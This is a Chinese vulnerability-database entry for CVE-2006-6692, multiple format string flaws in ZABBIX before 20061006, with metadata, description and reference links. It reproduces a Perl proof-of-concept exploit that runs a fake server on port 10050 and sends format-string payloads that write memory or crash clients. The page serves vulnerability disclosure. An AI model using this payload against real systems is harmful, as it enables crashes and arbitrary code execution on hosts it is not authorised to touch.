ZABBIX 多个格式化字符串漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111214 漏洞类型 格式化字符串
发布时间 2006-10-09 更新时间 2006-12-22
CVE编号 CVE-2006-6692 CNNVD-ID CNNVD-200612-473
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28775
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-473
|漏洞详情
zabbix的20061006之前版本存在多个格式化字符串漏洞,攻击者可以通过要在使用(1)zabbix_log或(2)zabbix_syslog在系统日志中记录的信息中的格式化字符串限定符来发起拒绝服务攻击(应用程序崩溃)并可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20416/info

ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities. 

Reports indicate that these issues facilitate format-string and buffer-overflow attacks. A remote attacker may leverage these vulnerabilities to trigger denial-of-service conditions or to execute arbitrary code to gain unauthorized access to a vulnerable computer. This would occur in the context of the application.

ZABBIX version 1.1.2 is reported vulnerable; other versions may be affected as well.

#!/usr/bin/perl --

# zabbix-exploiter
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.

use IO::Socket;
$server = IO::Socket::INET->new( Proto     => 'tcp',
                                 LocalPort => 10050,
                                 Listen    => SOMAXCONN,
                                 Reuse     => 1);
die "can't create server\n" if !$server;

while ($client = $server->accept())
{
  $client->autoflush(1);
  $key = <$client>; print $key;
  print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing
  # print $client '%n%n%n%n'; # crashes
  close $client;
}
|参考资料

来源:BID
名称:20416
链接:http://www.securityfocus.com/bid/20416
来源:VUPEN
名称:ADV-2006-3959
链接:http://www.frsirt.com/english/advisories/2006/3959
来源:SECUNIA
名称:22313
链接:http://secunia.com/advisories/22313
来源:bugs.debian.org
链接:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=391388
来源:bugs.debian.org
链接:http://bugs.debian.org/cgi-bin/bugreport.cgi/zabbix.security.patch?bug=391388;msg=5;att=1